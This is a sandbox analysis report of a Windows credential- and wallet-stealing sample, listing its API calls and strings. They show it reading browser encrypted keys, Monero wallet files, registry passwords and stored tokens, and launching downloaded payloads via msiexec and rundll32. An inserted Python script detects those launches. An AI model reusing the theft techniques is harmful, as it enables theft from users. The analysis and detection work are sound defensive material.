                                • API String ID: 949356159-974132213
                                • Opcode ID: c779506257512f446941b37081ec9b9da8fb5a4cb85a8576ab472fe6423c0000
                                • Instruction ID: 434308f163bf2f0e6a423b96f54acf682cbd78aa71ee0e240333853871026950
                                • Opcode Fuzzy Hash: c779506257512f446941b37081ec9b9da8fb5a4cb85a8576ab472fe6423c0000
                                • Instruction Fuzzy Hash: A04183BA94020867D750F770DC4BFED3A38BB64700F404594B289660C1EEB59BC98B96
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0050906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 2e630800738818b7d46b311794bd0cadc9cc16f98219971f7c3d3bcae80a9d2f
                                • Instruction ID: 7aecce4c32fcb039f0cd2656886e97be152f5581ff916b3323f370f424b40317
                                • Opcode Fuzzy Hash: 2e630800738818b7d46b311794bd0cadc9cc16f98219971f7c3d3bcae80a9d2f
                                • Instruction Fuzzy Hash: 2D71FB75A00209FBDB04DBE4DC89FEEBBB9BF48301F108508F655A7294DB39A905CB65
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 005031C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 0050335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 005034EA
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: a71da134f1d0caf5d86bb97fc5dac8536a166b5eb56753d27061dd725e8715ba
                                • Instruction ID: eea7926ac5af3cef016981c8b8399151a1da2ecbd371fd7ef55356b08ac8c7bc
                                • Opcode Fuzzy Hash: a71da134f1d0caf5d86bb97fc5dac8536a166b5eb56753d27061dd725e8715ba
                                • Instruction Fuzzy Hash: F51223719102099ADB05FBA0CD9AFEEBB38BFA4300F508559F506661D1EF742B4ACF52
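The three ShellExecuteEx call sites above, together with the string set `/i "`, ` /passive`, `.msi`, `.dll`, `C:\Windows\system32\msiexec.exe` and `C:\Windows\system32\rundll32.exe`, describe how the sample hands a downloaded payload to a signed Windows binary. The Python below is an added detection example, not code from the report or from the sample: it runs over constructed process-creation events (parent image, child image, command line) and flags msiexec.exe started with `/i <path>.msi /passive` where the package sits in a user-writable directory, and rundll32.exe started with a bare `.dll` path in such a directory, adding a second hit when the parent process itself lives there. The event tuples, paths and the directory list are assumptions for the example.

```python
import re

# Constructed sample process-creation events for the example:
# (parent image, child image, child command line). Paths are assumptions.
SAMPLE_EVENTS = [
    (r"C:\Users\victim\AppData\Local\Temp\file.exe",
     r"C:\Windows\system32\msiexec.exe",
     r'C:\Windows\system32\msiexec.exe /i "C:\Users\victim\AppData\Local\Temp\update.msi" /passive'),
    (r"C:\Users\victim\AppData\Local\Temp\file.exe",
     r"C:\Windows\system32\rundll32.exe",
     r'C:\Windows\system32\rundll32.exe "C:\Users\victim\AppData\Local\Temp\a.dll"'),
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\system32\msiexec.exe",
     r'C:\Windows\system32\msiexec.exe /i "C:\Program Files\Vendor\setup.msi"'),
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\system32\rundll32.exe",
     r"C:\Windows\system32\rundll32.exe shell32.dll,Control_RunDLL"),
]

# Directories an unprivileged user can write to; an assumed list, extend per estate.
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)"
    r"|Users\\Public|ProgramData|Windows\\Temp)\\",
    re.IGNORECASE,
)
# Windows command lines: double-quoted arguments may contain spaces.
ARG = re.compile(r'"([^"]*)"|(\S+)')


def split_cmdline(cmdline):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in ARG.findall(cmdline)]


def classify(parent, image, cmdline):
    """Return a list of (rule, detail) hits for one process-creation event."""
    hits = []
    child = image.rsplit("\\", 1)[-1].lower()
    args = split_cmdline(cmdline)[1:]
    lowered = [a.lower() for a in args]
    if child == "msiexec.exe" and "/i" in lowered:
        pos = lowered.index("/i") + 1
        target = args[pos] if pos < len(args) else ""
        # Passive (no-prompt) install of a package dropped in a user-writable directory.
        if target.lower().endswith(".msi") and USER_WRITABLE.search(target) and "/passive" in lowered:
            hits.append(("msiexec_passive_install_from_user_dir", target))
    elif child == "rundll32.exe" and args:
        # rundll32 "<path>.dll" with no export name, loaded from a user-writable directory.
        if lowered[0].endswith(".dll") and USER_WRITABLE.search(args[0]):
            hits.append(("rundll32_dll_from_user_dir", args[0]))
    if hits and USER_WRITABLE.search(parent):
        hits.append(("parent_in_user_writable_dir", parent))
    return hits


def scan(events=SAMPLE_EVENTS):
    """Map event index to its hits, for every event that triggers at least one rule."""
    flagged = {}
    for idx, event in enumerate(events):
        hits = classify(*event)
        if hits:
            flagged[idx] = hits
    return flagged


if __name__ == "__main__":
    for idx, hits in scan().items():
        print(idx, hits)
```

Both rules are deliberately narrow (package or DLL under a user-writable path, and for msiexec the `/passive` switch the strings above show); a bare `msiexec /i` rule would page on every software installer, while the parent-directory hit is what separates a stealer launching a second stage from an administrator running an installer from Downloads.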
                                APIs
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F6280: InternetOpenA.WININET(00510DFE,00000001,00000000,00000000,00000000), ref: 004F62E1
                                  • Part of subcall function 004F6280: StrCmpCA.SHLWAPI(?,012DE250), ref: 004F6303
                                  • Part of subcall function 004F6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004F6335
                                  • Part of subcall function 004F6280: HttpOpenRequestA.WININET(00000000,GET,?,012DDC38,00000000,00000000,00400100,00000000), ref: 004F6385
                                  • Part of subcall function 004F6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004F63BF
                                  • Part of subcall function 004F6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004F63D1
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00505318
                                • lstrlen.KERNEL32(00000000), ref: 0050532F
                                  • Part of subcall function 00508E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00508E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00505364
                                • lstrlen.KERNEL32(00000000), ref: 00505383
                                • lstrlen.KERNEL32(00000000), ref: 005053AE
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 9add5a15db74e308ded79922162993754764daae67a9d06e21f80bc40ad540fc
                                • Instruction ID: 06230bc272dbb5c99b6910a5628deb9728d5446d14aefd91a95765fd2feb8b46
                                • Opcode Fuzzy Hash: 9add5a15db74e308ded79922162993754764daae67a9d06e21f80bc40ad540fc
                                • Instruction Fuzzy Hash: 4351FB30910249ABDB14EF60CD9AEEE7B79FF94301F508018E9065A5D1EF346B46CB66
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c0584190a0d747132cb9bb377432145726a8245bd8657e2fb0db9936c8686d2a
                                • Instruction ID: b8df89b2506a9dacacc40917c4d94b9cd87291218b2bbb6be8fc670e1ddac8c0
                                • Opcode Fuzzy Hash: c0584190a0d747132cb9bb377432145726a8245bd8657e2fb0db9936c8686d2a
                                • Instruction Fuzzy Hash: A8C154B590021AABCB14EF60DC8EFEE7778BFA4304F104598F50A671C1DA74AA85CF95
                                APIs
                                  • Part of subcall function 00508DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00508E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 005042EC
                                • lstrcat.KERNEL32(?,012DDCE0), ref: 0050430B
                                • lstrcat.KERNEL32(?,?), ref: 0050431F
                                • lstrcat.KERNEL32(?,012DC988), ref: 00504333
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 00508D90: GetFileAttributesA.KERNEL32(00000000,?,004F1B54,?,?,0051564C,?,?,00510E1F), ref: 00508D9F
                                  • Part of subcall function 004F9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004F9D39
                                  • Part of subcall function 004F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F99EC
                                  • Part of subcall function 004F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004F9A11
                                  • Part of subcall function 004F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004F9A31
                                  • Part of subcall function 004F99C0: ReadFile.KERNEL32(000000FF,?,00000000,004F148F,00000000), ref: 004F9A5A
                                  • Part of subcall function 004F99C0: LocalFree.KERNEL32(004F148F), ref: 004F9A90
                                  • Part of subcall function 004F99C0: CloseHandle.KERNEL32(000000FF), ref: 004F9A9A
                                  • Part of subcall function 005093C0: GlobalAlloc.KERNEL32(00000000,005043DD,005043DD), ref: 005093D3
                                • StrStrA.SHLWAPI(?,012DDD28), ref: 005043F3
                                • GlobalFree.KERNEL32(?), ref: 00504512
                                  • Part of subcall function 004F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NO,00000000,00000000), ref: 004F9AEF
                                  • Part of subcall function 004F9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,004F4EEE,00000000,?), ref: 004F9B01
                                  • Part of subcall function 004F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NO,00000000,00000000), ref: 004F9B2A
                                  • Part of subcall function 004F9AC0: LocalFree.KERNEL32(?,?,?,?,004F4EEE,00000000,?), ref: 004F9B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 005044A3
                                • StrCmpCA.SHLWAPI(?,005108D1), ref: 005044C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 005044D2
                                • lstrcat.KERNEL32(00000000,?), ref: 005044E5
                                • lstrcat.KERNEL32(00000000,00510FB8), ref: 005044F4
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: d561a0bb1182e2b51f8b51bddee63d872686ae216211e55d81f6ba74546f4d71
                                • Instruction ID: df3dc64ddae9c255f4252bb8bf6cc611fbd72a50fb87bd0e4b43c92f0007241b
                                • Opcode Fuzzy Hash: d561a0bb1182e2b51f8b51bddee63d872686ae216211e55d81f6ba74546f4d71
                                • Instruction Fuzzy Hash: B37133B6900208BBDB14FBA0DC8AFEE7779BB88300F048598F64597181EA75DB45CF95
                                APIs
                                  • Part of subcall function 004F12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F12B4
                                  • Part of subcall function 004F12A0: RtlAllocateHeap.NTDLL(00000000), ref: 004F12BB
                                  • Part of subcall function 004F12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004F12D7
                                  • Part of subcall function 004F12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004F12F5
                                  • Part of subcall function 004F12A0: RegCloseKey.ADVAPI32(?), ref: 004F12FF
                                • lstrcat.KERNEL32(?,00000000), ref: 004F134F
                                • lstrlen.KERNEL32(?), ref: 004F135C
                                • lstrcat.KERNEL32(?,.keys), ref: 004F1377
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 00508B60: GetSystemTime.KERNEL32(00510E1A,012D9AC8,005105AE,?,?,004F13F9,?,0000001A,00510E1A,00000000,?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 00508B86
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004F1465
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F99EC
                                  • Part of subcall function 004F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004F9A11
                                  • Part of subcall function 004F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004F9A31
                                  • Part of subcall function 004F99C0: ReadFile.KERNEL32(000000FF,?,00000000,004F148F,00000000), ref: 004F9A5A
                                  • Part of subcall function 004F99C0: LocalFree.KERNEL32(004F148F), ref: 004F9A90
                                  • Part of subcall function 004F99C0: CloseHandle.KERNEL32(000000FF), ref: 004F9A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 004F14EF
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: d42aefed3f8d5e45208df13ce418e1e1c7af112c2bfd493b9b3877ac09742873
                                • Instruction ID: 91850d60e41d87c4f02ee8f01c75bdc4950204f0bea1d3be1c6c3ece842d95a9
                                • Opcode Fuzzy Hash: d42aefed3f8d5e45208df13ce418e1e1c7af112c2bfd493b9b3877ac09742873
                                • Instruction Fuzzy Hash: 0C5162B195021997DB15EB60DD96FED773CBF90300F408198B60A620D1EE345B89CFA6
                                APIs
                                  • Part of subcall function 004F72D0: memset.MSVCRT ref: 004F7314
                                  • Part of subcall function 004F72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004F733A
                                  • Part of subcall function 004F72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004F73B1
                                  • Part of subcall function 004F72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004F740D
                                  • Part of subcall function 004F72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 004F7452
                                  • Part of subcall function 004F72D0: HeapFree.KERNEL32(00000000), ref: 004F7459
                                • lstrcat.KERNEL32(00000000,005117FC), ref: 004F7606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F7648
                                • lstrcat.KERNEL32(00000000, : ), ref: 004F765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F768F
                                • lstrcat.KERNEL32(00000000,00511804), ref: 004F76A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F76D3
                                • lstrcat.KERNEL32(00000000,00511808), ref: 004F76ED
                                • task.LIBCPMTD ref: 004F76FB
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: :
                                • API String ID: 3191641157-3653984579
                                • Opcode ID: 95d4d351cec6b1690290c82f160525363cda0715650a1da45e7bca62a8eaf457
                                • Instruction ID: cbac654f36daeaae8f99e3961a3050225a31cfa3c22b761210d021ba1b526766
                                • Opcode Fuzzy Hash: 95d4d351cec6b1690290c82f160525363cda0715650a1da45e7bca62a8eaf457
                                • Instruction Fuzzy Hash: E4315E71900109EFEB05EBB4DC86DFF7778BB44306B14811DF202A72A0DA3CA946CB5A
                                APIs
                                • memset.MSVCRT ref: 004F7314
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004F733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004F73B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004F740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004F7452
                                • HeapFree.KERNEL32(00000000), ref: 004F7459
                                • task.LIBCPMTD ref: 004F7555
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: Password
                                • API String ID: 2808661185-3434357891
                                • Opcode ID: f8af55e4fbd8b9192894ecc493644465d518eb272f5fa56a6660beeed2c3ca8e
                                • Instruction ID: 771e27f2de0de81b381d4c30dd8536589dabf1bcffb8ac7fd034617b51bb499e
                                • Opcode Fuzzy Hash: f8af55e4fbd8b9192894ecc493644465d518eb272f5fa56a6660beeed2c3ca8e
                                • Instruction Fuzzy Hash: C4612DB590416C9BDB24DB50CC45BEAB7B8BF44304F0081EAE689A6181DF785FC9CF95
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,012DD800,00000000,?,00510E2C,00000000,?,00000000), ref: 00508130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00508137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00508158
                                • __aulldiv.LIBCMT ref: 00508172
                                • __aulldiv.LIBCMT ref: 00508180
                                • wsprintfA.USER32 ref: 005081AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: 0cf84fe89201dac4a6d889ef44f5d2b9356f99571822cd183f5e61b6d4a518f0
                                • Instruction ID: a4763e02ce47656cea698d260372a89547865ac741c23003df6c2147749da9b1
                                • Opcode Fuzzy Hash: 0cf84fe89201dac4a6d889ef44f5d2b9356f99571822cd183f5e61b6d4a518f0
                                • Instruction Fuzzy Hash: 03214FB1E44209ABEB00DFD4DC4AFAEBB78FB44710F104509F605BB2C0C77859018BA5
                                APIs
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004F4839
                                  • Part of subcall function 004F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004F4849
                                • InternetOpenA.WININET(00510DF7,00000001,00000000,00000000,00000000), ref: 004F610F
                                • StrCmpCA.SHLWAPI(?,012DE250), ref: 004F6147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004F618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004F61B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 004F61DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004F620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 004F6249
                                • InternetCloseHandle.WININET(?), ref: 004F6253
                                • InternetCloseHandle.WININET(00000000), ref: 004F6260
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: fb04d4db6778a419b73fdc289d16acda3b8ca2561cd03506223b250ed7355eda
                                • Instruction ID: 314224634bd193336dc9c2b81fb1575dbeda2600134abfd065aa3f61922e5f73
                                • Opcode Fuzzy Hash: fb04d4db6778a419b73fdc289d16acda3b8ca2561cd03506223b250ed7355eda
                                • Instruction Fuzzy Hash: 6F51737190021CABEB20DF50DD4ABEE77B8FB44701F108099B745A71C1DB786A85CF9A
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                • lstrlen.KERNEL32(00000000), ref: 004FBC9F
                                  • Part of subcall function 00508E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00508E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 004FBCCD
                                • lstrlen.KERNEL32(00000000), ref: 004FBDA5
                                • lstrlen.KERNEL32(00000000), ref: 004FBDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 90c044207d3dc4ba7471d8c792b717ab712b91cb7a0ed24faebd787e7bdbe09d
                                • Instruction ID: 9f9ee5a131d23718cbcd3883e3a82be90f9a5f3ceb6ce190fd108d3acbdea86b
                                • Opcode Fuzzy Hash: 90c044207d3dc4ba7471d8c792b717ab712b91cb7a0ed24faebd787e7bdbe09d
                                • Instruction Fuzzy Hash: 63B11771910209ABDB04FBA0DD5AEEE7B3CBF94300F408559F507A61D1EF346A49CBA6
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 5773b925f38f0ea219073393d75b6596a8f303faa790c67175db13187bfcf6d8
                                • Instruction ID: 3b25880f2a4bb3152b044906734e031d7a295b81f6568d22c39a7ac47761330e
                                • Opcode Fuzzy Hash: 5773b925f38f0ea219073393d75b6596a8f303faa790c67175db13187bfcf6d8
                                • Instruction Fuzzy Hash: 15F0823090520AFFE3449FE0E94A76C7B70FB04703F048198F649862D0D6784B51DB9A
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004F4FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F4FD1
                                • InternetOpenA.WININET(00510DDF,00000000,00000000,00000000,00000000), ref: 004F4FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 004F5011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 004F5041
                                • InternetCloseHandle.WININET(?), ref: 004F50B9
                                • InternetCloseHandle.WININET(?), ref: 004F50C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 0c1c69ec0e77308a4c8fb735f790a53faa94c9cd4d862bec7c5dad39f37ae44b
                                • Instruction ID: d6a9cadc63fff24144ef9a3e63aefa45a62cbd09571de04a4a26fc2f05fd1ac7
                                • Opcode Fuzzy Hash: 0c1c69ec0e77308a4c8fb735f790a53faa94c9cd4d862bec7c5dad39f37ae44b
                                • Instruction Fuzzy Hash: DA31E4B4A00218ABDB20CF54DC89BDDB7B4FB48705F1081D9EB49A7281DB746AC58F9D
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00508426
                                • wsprintfA.USER32 ref: 00508459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0050847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0050848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00508499
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,012DD968,00000000,000F003F,?,00000400), ref: 005084EC
                                • lstrlen.KERNEL32(?), ref: 00508501
                                • RegQueryValueExA.ADVAPI32(00000000,012DDAA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00510B34), ref: 00508599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00508608
                                • RegCloseKey.ADVAPI32(00000000), ref: 0050861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: a48ca140795fc184586abaaf61e931adf379ccaeef0a2a13a97f81f96cbb6441
                                • Instruction ID: a8d2074dde2e42a619b8916c7a6770372c9051961d585c30beabc09be202d3c3
                                • Opcode Fuzzy Hash: a48ca140795fc184586abaaf61e931adf379ccaeef0a2a13a97f81f96cbb6441
                                • Instruction Fuzzy Hash: 6F212A7190022CABEB24DB54DC85FE9B7B8FB48701F00C5D8E649A6280DF756A85CFD4
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005076A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 005076AB
                                • RegOpenKeyExA.ADVAPI32(80000002,012CB738,00000000,00020119,00000000), ref: 005076DD
                                • RegQueryValueExA.ADVAPI32(00000000,012DD830,00000000,00000000,?,000000FF), ref: 005076FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00507708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: ccbc9e0320f5f9ea425136dffc4a0e1f5f5271ae1a030f69f62fb29b4ce00a55
                                • Instruction ID: 542751fffaa7098881bd52a18bcbbdeda1cef132fe4fd5d614c4f7b812dfaeef
